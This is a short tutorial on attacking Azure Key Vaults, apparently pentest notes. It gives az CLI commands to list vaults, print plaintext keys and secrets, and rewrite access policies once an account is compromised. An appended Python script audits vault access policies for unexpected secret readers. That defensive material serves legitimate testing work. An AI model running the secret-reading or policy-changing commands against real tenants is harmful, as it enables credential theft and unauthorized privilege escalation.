
Attacking Key Vaults

While owning users and devices in AAD environments, it's good practice to look out for permissions like:

Microsoft.KeyVault/vaults/read                    # read keys in a vault
Microsoft.KeyVault/vaults/secrets/read            # read the plaintext passwords in a vault
Microsoft.KeyVault/vaults/accessPolicies/write    # change access policies of vaults

To list the key vaults we have access to, we use:

PS /home/otter> az keyvault list

If we have the right permissions we can also list the keys and secrets stored in the vaults:

  • keys are usually stored at https://<keyvault_name>.vault.azure.net/keys/<key_name>
# list keys
PS /home/otter> az keyvault key list --vault-name <vault_name>
# show plaintext keys
PS /home/otter> az keyvault key show --vault-name <vault_name> -n <key_name>
  • secrets are usually stored at https://<keyvault_name>.vault.azure.net/secrets/<secret_name>
# list secrets
PS /home/otter> az keyvault secret list --vault-name <vault_name>
# show plaintext secrets
PS /home/otter> az keyvault secret show --vault-name <vault_name> -n <secret_name> --query value -o tsv

If we compromised a user that can change the access policy for a vault, we can delegate permissions to other users:

PS /home/otter> az keyvault set-policy -n <vault_name> --key-permission get list --upn otter@minions.onmicrosoft.com
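From the defender's side, the same accessPolicies/write and secrets/read permissions are what an audit should look for. The script below is an added example (not part of the original notes): it walks the accessPolicies block in the JSON shape returned by `az keyvault show -n <vault_name> -o json` and reports every principal that can read plaintext secrets but is not on an allowlist of expected readers. The vault JSON and the object IDs are constructed sample values, and the allowlist is a hypothetical input the operator maintains.

```python
import json

# Constructed sample in the shape of `az keyvault show -n <vault_name> -o json`,
# trimmed to the fields the audit needs. Object IDs are placeholders.
SAMPLE_VAULT = json.loads("""
{
  "name": "minions-vault",
  "properties": {
    "enableRbacAuthorization": false,
    "accessPolicies": [
      {"objectId": "11111111-0000-0000-0000-000000000001",
       "permissions": {"keys": ["get", "list"], "secrets": ["get", "list"], "certificates": []}},
      {"objectId": "22222222-0000-0000-0000-000000000002",
       "permissions": {"keys": ["get"], "secrets": ["all"], "certificates": []}},
      {"objectId": "33333333-0000-0000-0000-000000000003",
       "permissions": {"keys": ["list"], "secrets": [], "certificates": []}}
    ]
  }
}
""")

# Hypothetical allowlist: object IDs (e.g. an app's managed identity) that are
# expected to read secrets from this vault.
EXPECTED_SECRET_READERS = {"11111111-0000-0000-0000-000000000001"}

# Permission values that let a principal obtain plaintext secret values.
# "all" expands to every secret permission, so it counts as read access too.
SECRET_READ = {"get", "list", "all"}


def audit_access_policies(vault, expected_readers):
    """Return (objectId, reason) findings for principals with unexpected secret read access."""
    props = vault["properties"]
    if props.get("enableRbacAuthorization"):
        # With RBAC authorization enabled the accessPolicies block is ignored;
        # the role assignments on the vault have to be audited instead.
        return [("*", "vault uses RBAC; accessPolicies are not enforced")]
    findings = []
    for policy in props.get("accessPolicies", []):
        oid = policy["objectId"]
        secret_perms = {p.lower() for p in policy["permissions"].get("secrets", [])}
        readable = secret_perms & SECRET_READ
        if readable and oid not in expected_readers:
            findings.append((oid, f"unexpected secret read permissions: {sorted(readable)}"))
    return findings


if __name__ == "__main__":
    for oid, reason in audit_access_policies(SAMPLE_VAULT, EXPECTED_SECRET_READERS):
        print(f"{SAMPLE_VAULT['name']}: {oid}: {reason}")
```

Run it over the real `az keyvault show` output for each vault from `az keyvault list`; any principal it reports is either a policy that should be removed or one that needs adding to the allowlist.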